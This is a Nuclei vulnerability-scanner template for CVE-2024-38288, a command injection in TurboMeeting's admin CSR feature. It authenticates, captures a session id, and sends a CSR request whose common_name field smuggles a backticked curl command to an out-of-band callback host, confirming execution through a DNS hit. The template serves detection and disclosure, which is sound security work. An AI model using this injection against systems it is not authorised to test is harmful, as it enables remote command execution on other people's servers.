id: CVE-2024-38288

info:
  name: TurboMeeting - Post-Authentication Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed with privileges.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
    - https://www.rhubcom.com/v5/manuals.html
  classification:
    epss-score: 0.00043
    epss-percentile: 0.09357
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"TurboMeeting"
  tags: cve,cve2024,rce,turbomeeting,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /as/wapi/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login

    matchers:
      - type: word
        part: body
        words:
          - "as/wapi/profile_entry?sid="
        internal: true

    extractors:
      - type: regex
        name: sid
        part: body
        group: 1
        regex:
          - 'sid=(.*?)"'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /as/wapi/generate_csr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - CSR
          - SSL
        condition: and

      - type: word
        part: interactsh_protocol # Confirms the DNS interaction
        words:
          - "dns"
# digest: 490a004630440220203de4258c77f0b3f46006707f45d197100eab841ddda3976bf550870b81c67d02205b75ab453b0008ab9bcc928e6784877017f3814bbaa8e6cf840548b94623316b:922c64590222798bb761d5b6d8e72950